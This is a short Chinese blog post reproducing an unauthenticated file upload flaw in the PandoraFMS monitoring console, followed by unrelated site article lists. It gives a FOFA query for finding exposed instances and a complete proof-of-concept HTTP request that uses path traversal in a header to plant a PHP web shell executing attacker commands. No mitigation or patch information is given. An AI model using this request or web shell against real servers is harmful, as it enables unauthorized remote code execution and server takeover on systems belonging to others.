PandoraFMS 监控软件 任意文件上传漏洞复现

0x01 产品简介

Pandora FMS 是用于监控计算机网络的软件。 Pandora FMS 允许以可视化方式监控来自不同操作系统、服务器、应用程序和硬件系统(例如防火墙、代理、数据库、Web 服务器或路由器)的多个参数的状态和性能。

0x02 漏洞概述

PandoraFMS upload_head_image.php 接口处存在未授权文件上传漏洞,攻击者可上传恶意木马获取服务器权限。

0x03 复现环境

FOFA:app="PANDORAFMS-产品"

0x04 漏洞复现

PoC

POST /pandora_console/enterprise/meta/general/upload_head_image.php?up=true HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Up-Filename: ../../../../../../../../../../var/www/html/pandora_console/extensions/rce.php
Accept-Encoding: gzip
Connection: close

<?php system($_REQUEST['c']); ?>

直接上传一句话

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-10 22:36:02       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-10 22:36:02       100 阅读
  3. 在Django里面运行非项目文件

    2023-12-10 22:36:02       82 阅读
  4. Python语言-面向对象

    2023-12-10 22:36:02       91 阅读

热门阅读

  1. 数据管理系统-week12-数据库审计(Database Auditing)

    2023-12-10 22:36:02       53 阅读
  2. kubeadm搭建1.20.7版本k8s

    2023-12-10 22:36:02       50 阅读
  3. CT成像技术—20231205

    2023-12-10 22:36:02       39 阅读
  4. pip基本命令与使用

    2023-12-10 22:36:02       60 阅读
  5. 蓝桥杯 day01 奇怪的数列 特殊日期

    2023-12-10 22:36:02       52 阅读
  6. 信息处理技术员

    2023-12-10 22:36:02       57 阅读
  7. 汽车继电器

    2023-12-10 22:36:02       52 阅读
  8. 使用git出现的问题

    2023-12-10 22:36:02       57 阅读